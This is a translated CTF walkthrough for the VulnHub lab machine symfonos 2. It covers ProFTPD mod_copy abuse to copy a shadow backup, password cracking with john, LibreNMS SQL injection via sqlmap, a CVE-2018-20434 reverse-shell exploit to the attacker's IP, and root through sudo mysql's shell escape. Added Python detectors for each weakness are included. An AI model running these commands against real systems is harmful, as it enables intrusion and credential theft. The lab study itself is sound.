【攻略鴨】symfonos 2 - VulnHub machine walkthrough

This article is purely fictional; please follow, like and support!
Set the target VM's network adapter to NAT.
Target IP address: 192.168.31.244
Attacking machine IP address: 192.168.31.37
External information gathering
Visiting http://192.168.31.145/ shows nothing but an image.
Port scan
PORT    STATE SERVICE     REASON         VERSION
21/tcp  open  ftp         syn-ack ttl 64 ProFTPD 1.3.5
22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp  open  http        syn-ack ttl 64 WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_  Supported Methods: GET HEAD
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
Host script results:
|_clock-skew: mean: 2h00m00s, deviation: 3h27m50s, median: 0s
| smb-security-mode:
|   account_used: guest
137/udp   open   netbios-ns
161/udp   open   snmp
Web directory enumeration
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.244/FUZZ
No results.
SMB null-session login
Contents of smb://192.168.31.244/anonymous/backups/log.txt:
root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
root@symfonos2:~# cat /etc/samba/smb.conf
[anonymous]
  path = /home/aeolus/share
  browseable = yes
  read only = yes
  guest ok = yes
root@symfonos2:~# cat /usr/local/etc/proftpd.conf
# Set the user and group under which the server will run.
User    aeolus
Group   aeolus
<Anonymous ~ftp>
 User    ftp
 Group   ftp
(At this point, password enumeration against the SSH and FTP services for the aeolus and ftp accounts is the obvious next step.)
FTP service check
Anonymous login on port 21 fails.
$ searchsploit ProFTPD
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                                     | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                           | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)                                       | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy                                                                     | linux/remote/36742.txt
$ searchsploit -m 36742.txt
Failed.
$ searchsploit -m 49908.py
Exploit Completed
[!] Something Went Wrong
[!] Directory might not be writable
$ searchsploit -m 36803.py
$ python2 36803.py 192.168.31.244 /var/www/html id
[ - ] Error : 404 [ - ]
$ searchsploit -m 37262.rb
msf6 > use exploit/unix/ftp/proftpd_modcopy_exec
[-] 192.168.31.244:80 - Exploit aborted due to failure: unknown: 192.168.31.244:21 - Failure copying PHP payload to website path, directory not writable?
All of the above fail because the web root is not writable; some other writable directory that can still be reached has to be found.
Exploiting the ProFTPD file copy vulnerability
Recall the share /home/aeolus/share, which is reachable through the SMB null session.
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /home/aeolus/share
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > exploit
[*] 192.168.31.244:80 - 192.168.31.244:21 - Sending copy commands to FTP server
[*] 192.168.31.244:80 - Executing PHP payload /8N231L.php
[-] 192.168.31.244:80 - Exploit aborted due to failure: unknown: 192.168.31.244:21 - Failure executing payload
Browsing smb://192.168.31.244/anonymous/ shows that the file /8N231L.php has indeed been written.
Going back to 36742.txt, use the ProFTPD file copy vulnerability to copy the target's password hash file into /home/aeolus/share:
$ ftp
ftp> o
(to) 192.168.31.244
Connected to 192.168.31.244.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.31.244]
Name (192.168.31.244:kali):
331 Password required for kali
Password:
530 Login incorrect.
ftp: Login failed
site cpfr /etc/passwd
site cpto /home/aeolus/share/passwd.copy
ftp> site cpfr /etc/shadow
350 File or directory exists, ready for destination name
ftp> site cpto /home/aeolus/share/shadow.copy
550 cpto: Permission denied
ftp> site cpfr /var/backups/shadow.bak
350 File or directory exists, ready for destination name
ftp> site cpto /home/aeolus/share/shadow.copy
250 Copy successful
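As an added example (not part of the original walkthrough), the Python script below replays a constructed copy of the FTP session above and flags every SITE CPFR/CPTO pair issued on a control channel that never received a 230 login reply, which is the trace mod_copy abuse leaves in FTP command logs or a packet capture. The transcript, the parser and the function names are assumptions.

```python
# Added example: flag ProFTPD mod_copy (SITE CPFR/CPTO) use on a control
# channel that never completed a login. Transcript is a constructed copy of
# the walkthrough's session; the parser is a hypothetical helper.
import re

TRANSCRIPT = """\
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.31.244]
331 Password required for kali
530 Login incorrect.
ftp> site cpfr /etc/shadow
350 File or directory exists, ready for destination name
ftp> site cpto /home/aeolus/share/shadow.copy
550 cpto: Permission denied
ftp> site cpfr /var/backups/shadow.bak
350 File or directory exists, ready for destination name
ftp> site cpto /home/aeolus/share/shadow.copy
250 Copy successful
"""

CMD_RE = re.compile(r"^(?:ftp>\s*)?site\s+(cpfr|cpto)\s+(\S+)", re.IGNORECASE)
REPLY_RE = re.compile(r"^(\d{3})\b")

def find_copies(transcript):
    """One dict per CPFR/CPTO pair: source, destination, whether the server
    accepted the copy (reply 250) and whether a 230 login preceded it."""
    logged_in, src, pending, findings = False, None, None, []
    for line in transcript.splitlines():
        m = CMD_RE.match(line)
        if m:
            verb, path = m.group(1).lower(), m.group(2)
            if verb == "cpfr":
                src = path
            else:                      # cpto: wait for the server's verdict
                pending = {"src": src, "dst": path, "authenticated": logged_in}
            continue
        r = REPLY_RE.match(line)
        if not r:
            continue
        if r.group(1) == "230":
            logged_in = True
        if pending is not None:
            pending["copied"] = r.group(1) == "250"
            findings.append(pending)
            pending = None
    return findings

def alerts(transcript):
    """Copy attempts issued without a prior login, successful or not."""
    return [f for f in find_copies(transcript) if not f["authenticated"]]
```

The failed /etc/shadow attempt is reported too: a denied copy still tells you someone is probing the server with SITE commands before logging in.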
Retrieve the exported hash files through the SMB null session:
smb://192.168.31.244/anonymous/passwd.copy
root:x:0:0:root:/root:/bin/bash
...
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
aeolus:x:1000:1000:,,,:/home/aeolus:/bin/bash
cronus:x:1001:1001:,,,:/home/cronus:/bin/bash
mysql:x:110:114:MySQL Server,,,:/nonexistent:/bin/false
Debian-snmp:x:111:115::/var/lib/snmp:/bin/false
librenms:x:999:999::/opt/librenms:
smb://192.168.31.244/anonymous/shadow.copy
root:$6$VTftENaZ$ggY84BSFETwhissv0N6mt2VaQN9k6/HzwwmTtVkDtTbCbqofFO8MVW.IcOKIzuI07m36uy9.565qelr/beHer.:18095:0:99999:7:::
aeolus:$6$dgjUjE.Y$G.dJZCM8.zKmJc9t4iiK9d723/bQ5kE1ux7ucBoAgOsTbaKmp.0iCljaobCntN3nCxsk4DLMy0qTn8ODPlmLG.:18095:0:99999:7:::
cronus:$6$wOmUfiZO$WajhRWpZyuHbjAbtPDQnR3oVQeEKtZtYYElWomv9xZLOhz7ALkHUT2Wp6cFFg1uLCq49SYel5goXroJ0SxU3D/:18095:0:99999:7:::
librenms:!:18095::::::
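The copy of shadow.bak succeeded because root's backup of /etc/shadow in /var/backups was readable by the unprivileged aeolus account that proftpd runs as (the same copy of /etc/shadow itself was denied). As an added example, not from the page, the Python audit below walks a directory and reports shadow-format files whose mode grants group or other read; the temporary directory and the sample lines it writes are constructed.

```python
# Added example: find copies of /etc/shadow readable without root, the
# weakness behind the shadow.bak copy above. Directory and sample files are
# constructed; nothing here comes from the page's own tooling.
import os
import re
import stat
import tempfile

# shadow(5) line: name, then a crypt hash ($id$...) or a lock marker (! or *),
# then seven ':'-separated numeric-or-empty fields (nine fields in total).
SHADOW_LINE = re.compile(r"^[a-z_][a-z0-9_-]*:(\$\d\$[^:]+|[!*]?):(\d*:){6}\d*$")

def looks_like_shadow(text):
    return any(SHADOW_LINE.match(ln) for ln in text.splitlines())

def exposed_shadow_copies(root):
    """(relative path, octal mode) for regular files under `root` that look
    like shadow data and whose mode grants group or other read."""
    found = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue
            if not st.st_mode & (stat.S_IRGRP | stat.S_IROTH):
                continue                     # owner-only: not the problem
            try:
                with open(path, errors="replace") as fh:
                    head = fh.read(4096)
            except OSError:
                continue
            if looks_like_shadow(head):
                found.append((os.path.relpath(path, root), oct(st.st_mode & 0o777)))
    return sorted(found)

def demo():
    """Constructed /var/backups look-alike: a 0644 copy (what `cat > file`
    leaves under umask 022) next to a 0600 copy and an unrelated file."""
    body = "root:!:18095:0:99999:7:::\naeolus:$6$saltsalt$constructedhash:18095:0:99999:7:::\n"
    tmp = tempfile.mkdtemp()
    for name, mode, text in (("shadow.bak", 0o644, body), ("shadow.safe", 0o600, body),
                             ("apt.extended_states.0", 0o644, "Package: gcc\n")):
        p = os.path.join(tmp, name)
        with open(p, "w") as fh:
            fh.write(text)
        os.chmod(p, mode)
    return exposed_shadow_copies(tmp)
```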
A quick look-up: LibreNMS is an open-source SNMP-based network monitoring application.
Crack the passwords with john:
$ unshadow passwd.copy shadow.copy > unshadowed.txt
Remove the entries for users that are of no interest.
$ john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
sergioteamo      (aeolus)
$ ssh aeolus@192.168.31.244
aeolus@symfonos2:~$ id
uid=1000(aeolus) gid=1000(aeolus) groups=1000(aeolus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
Privilege escalation
Kernel exploit
$ searchsploit Linux Kernel 4.9
No suitable privilege-escalation exploit is found.
aeolus@symfonos2:/tmp$ gcc CVE-2019-13272.c -o exp
aeolus@symfonos2:/tmp$ ./exp
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[-] Could not find pkexec executable at /usr/bin/pkexec
sudo privilege escalation as aeolus
$ sudo -V
Sudo version 1.8.19p1
aeolus@symfonos2:/tmp$ sudo -u#-1 /bin/bash
[sudo] password for aeolus:
aeolus is not in the sudoers file.
Check listening ports
tcp    LISTEN     0      80     127.0.0.1:3306                 *:*
tcp    LISTEN     0      50        *:139                   *:*
tcp    LISTEN     0      128    127.0.0.1:8080                 *:*
tcp    LISTEN     0      32        *:21                    *:*
tcp    LISTEN     0      128       *:22                    *:*
tcp    LISTEN     0      20     127.0.0.1:25                   *:*
tcp    LISTEN     0      50        *:445                   *:*
tcp    LISTEN     0      50       :::139                  :::*
tcp    LISTEN     0      64       :::80                   :::*
tcp    LISTEN     0      128      :::22                   :::*
tcp    LISTEN     0      20      ::1:25                   :::*
tcp    LISTEN     0      50       :::445                  :::*
127.0.0.1:8080 is bound to loopback and can only be reached from the target itself.
SSH local port forwarding
┌──(kali)-[~/pentest]
└─$ ssh -N -f -L 8999:127.0.0.1:8080 aeolus@192.168.31.244
aeolus@192.168.31.244's password:
┌──(kali)-[~/pentest]
└─$ firefox http://127.0.0.1:8999
http://127.0.0.1:8999/login
$ searchsploit -m 48453.txt
Requires a logged-in LibreNMS user.
http://127.0.0.1:8999/ajax_search.php?search=%27&type=group
This is a SQL injection point.
sqlmap -u "127.0.0.1:8999/ajax_search.php?search=1*&type=group" --cookie="PHPSESSID=tbvducu8v4cvcrko7cllj1ika6; XSRF-TOKEN=eyJpdiI6Im1UcnZ3ZE11a2VpOU8ycnhNdFFYb3c9PSIsInZhbHVlIjoieldlMGZuSzJvenlrZkZoZTJaVTQ5cCtiU1FoZGhRbVpxSDNBN0NYSDc3VEcrMjQzVlJBUzJpN3RrSUlLVTQ5OStxMlhzZm8zQytpRjV4dktGbjhWRHc9PSIsIm1hYyI6IjA0MjBiOTJlNGEwNzgxYTVlYTcwMWE2ZjQzOTM4NWJmZjBmZTI5MWYxZmIyNjMwN2YzMzAzODlkNzg1YzEzOWIifQ%3D%3D; librenms_session=eyJpdiI6InYxXC9uK0owOGs1SCtIdTBWN0xncU5BPT0iLCJ2YWx1ZSI6IitoWUhSQjBcL25pQytXbmNzcEI1NmNKWHRLd1k1OFh5ME8zOXZpTXhOTkRWY0lLVElEaWpZQlVrQmtqdCtMeUZNXC94c1JoZVcycThGa1VTVzRPYWF3WlE9PSIsIm1hYyI6IjUwYzAxYmJkOTE4NzMwYWUyNzdlZmJjYjdlMDRjNDNmNThkMGI0N2MyOWM1MTM0NTdkZDY0ZGJiMDNkNWMwZTYifQ%3D%3D" --batch --dbs
available databases [2]:
[*] information_schema
[*] librenms
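Added example, not from the page or from LibreNMS: detection logic that parses web-server access-log lines (constructed here in Combined Log Format, including the single-quote probe above and a sqlmap-style follow-up) and flags requests to ajax_search.php whose decoded search parameter carries SQL metacharacters. The log lines, status codes and the metacharacter list are assumptions.

```python
# Added example: spot the ajax_search.php probing seen above in web-server
# access logs. Log lines are constructed (Combined Log Format assumed); the
# metacharacter list is a starting point, not LibreNMS's own check.
import re
from urllib.parse import urlsplit, parse_qs

LOG = """\
127.0.0.1 - - [01/Jan/2021:10:00:00 +0000] "GET /ajax_search.php?search=core&type=group HTTP/1.1" 200 512 "-" "Mozilla/5.0"
127.0.0.1 - - [01/Jan/2021:10:00:05 +0000] "GET /ajax_search.php?search=%27&type=group HTTP/1.1" 500 0 "-" "Mozilla/5.0"
127.0.0.1 - - [01/Jan/2021:10:00:09 +0000] "GET /ajax_search.php?search=1%27%20AND%20SLEEP(5)--%20&type=group HTTP/1.1" 200 12 "-" "sqlmap/1.5"
127.0.0.1 - - [01/Jan/2021:10:00:12 +0000] "GET /login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) [^"]*" (\d{3})')
# Quote, comment and time-based markers; tune to the application's inputs.
SQLI_RE = re.compile(r"""('|"|--|/\*|\bsleep\s*\(|\bunion\b)""", re.IGNORECASE)

def parse_line(line):
    """Combined-Log-Format request line -> dict, or None if it does not parse."""
    m = REQ_RE.match(line)
    if not m:
        return None
    src, ts, method, target, status = m.groups()
    parts = urlsplit(target)
    return {"src": src, "ts": ts, "method": method, "path": parts.path,
            "query": parse_qs(parts.query, keep_blank_values=True),  # decodes %27
            "status": int(status)}

def suspicious(rec):
    """True for ajax_search.php requests whose decoded search parameter
    carries SQL metacharacters, the shape of the probe above."""
    if rec is None or not rec["path"].endswith("/ajax_search.php"):
        return False
    return any(SQLI_RE.search(v) for v in rec["query"].get("search", []))

def scan(log):
    """(source, timestamp, decoded search value, status) per suspicious hit."""
    return [(r["src"], r["ts"], r["query"]["search"][0], r["status"])
            for r in map(parse_line, log.splitlines()) if suspicious(r)]
```

Because ajax_search.php sits behind the login, every hit comes from an authenticated session, so the source address and timestamp should be matched against the LibreNMS user who was logged in at that time.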
$ searchsploit -m 47044.py
CVE-2018-20434: LibreNMS 1.46 - 'addhost' RCE
The vulnerability is triggered in capture.inc.php in LibreNMS 1.46 and earlier, and it requires an authenticated LibreNMS user.
For testing, log in to http://127.0.0.1:8999 as aeolus:sergioteamo; the redirect to http://127.0.0.1:8999/addhost yields the cookie.
$ nc -nvlp 5433
$ python2 47044.py http://127.0.0.1:8999 "PHPSESSID=3t1mq50uvdkdt0qg04atr1pl02; XSRF-TOKEN=eyJpdiI6ImNcL0lPcXhKOFwvWFdzbnBNZG9xSFREQT09IiwidmFsdWUiOiJDc01rXC9uRHhDcnF3SSsrV0hpQURqQzR3RjkwVVgyTDlpZlE5bWNuNzhGK1NqOWpvaWdzK2R1MHB0WEZIYVRaTGVwNWgwakNrWHF4ZlwvSHprRCtWQVBBPT0iLCJtYWMiOiJlOTAwNTA1OGUzMTBkM2RiMDZkZWRjNjUxOWQ5NzBhNmFkN2QxNzRkMTc1ZWZkOTEzMWExZTdhNDcwNWY2MTMyIn0%3D; librenms_session=eyJpdiI6IlNxYyt0eEFXVDcrUTRcLzZjdlgxU3Z3PT0iLCJ2YWx1ZSI6InNlZFwvUkhicHN6d1dWMEVGK0JMbThZcTFWSnZOQjBmUVhMRWxoTUE2Sk83K1NaN09tTktYamFHNGlVcGJwWElVcEdxVUdHeVdUSVlmWUxCbEVzK2xqZz09IiwibWFjIjoiZmRhYTBmZTc0YzY2ODFkMWYxYjAzNDQyOGY3Yjk5NGJmM2JkMjNhZjZiYWQyOTY1OGExODc3ODVkZDA3ZjRiZSJ9" 192.168.31.37 5433
[+] Device Created Sucssfully
Check the reverse shell:
$ id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
sudo privilege escalation
$ sudo -l
User cronus may run the following commands on symfonos2:
(root) NOPASSWD: /usr/bin/mysql
$ sudo mysql -e '\! /bin/sh'
id
uid=0(root) gid=0(root) groups=0(root)
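As an added example, not from the page, the Python audit below parses `sudo -l` output and flags rules that let a user run, as root, a program able to spawn a shell, such as the mysql client's `\! command` escape used above; NOPASSWD rules are singled out because they need no credential at all. The sample output and the SHELL_CAPABLE set are constructed.

```python
# Added example: audit `sudo -l` output for rules that hand root a program
# able to spawn a shell, such as the mysql client's `\! cmd` escape used
# above. The sample output and the SHELL_CAPABLE set are constructed.
import re

# Interactive programs with a documented "run a command" escape or the
# ability to execute arbitrary code; extend for the hosts being audited.
SHELL_CAPABLE = {"mysql", "vi", "vim", "less", "more", "man", "find",
                 "python", "python3", "perl", "sh", "bash"}

# "(runas) TAG: TAG: /path/cmd args, /path/other" as printed by `sudo -l`.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(text):
    """List of (runas, tag set, command) for every rule line."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        runas = m.group("runas").split(":")[0].strip()   # "(user:group)" -> user
        for cmd in m.group("cmds").split(","):
            if cmd.strip():
                rules.append((runas, tags, cmd.strip()))
    return rules

def risky_rules(text):
    """(command, passwordless?) for rules giving root a shell-capable program."""
    out = []
    for runas, tags, cmd in parse_sudo_l(text):
        prog = cmd.split()[0].rsplit("/", 1)[-1]
        if runas in ("root", "ALL") and (cmd == "ALL" or prog in SHELL_CAPABLE):
            out.append((cmd, "NOPASSWD" in tags))
    return out

# Constructed `sudo -l` output in the shape of the one above.
SAMPLE = """\
Matching Defaults entries for cronus on symfonos2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/sbin:/sbin:/bin

User cronus may run the following commands on symfonos2:
    (root) NOPASSWD: /usr/bin/mysql
    (root) /usr/bin/systemctl restart snmpd, /usr/bin/less /var/log/syslog
"""
```

A rule like the mysql one cannot be fixed by restricting arguments; the fix is to give the account a wrapper that runs only the queries it needs, or a dedicated MySQL user instead of sudo.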
Other
Flag
cat /root/proof.txt
Congrats on rooting symfonos:2!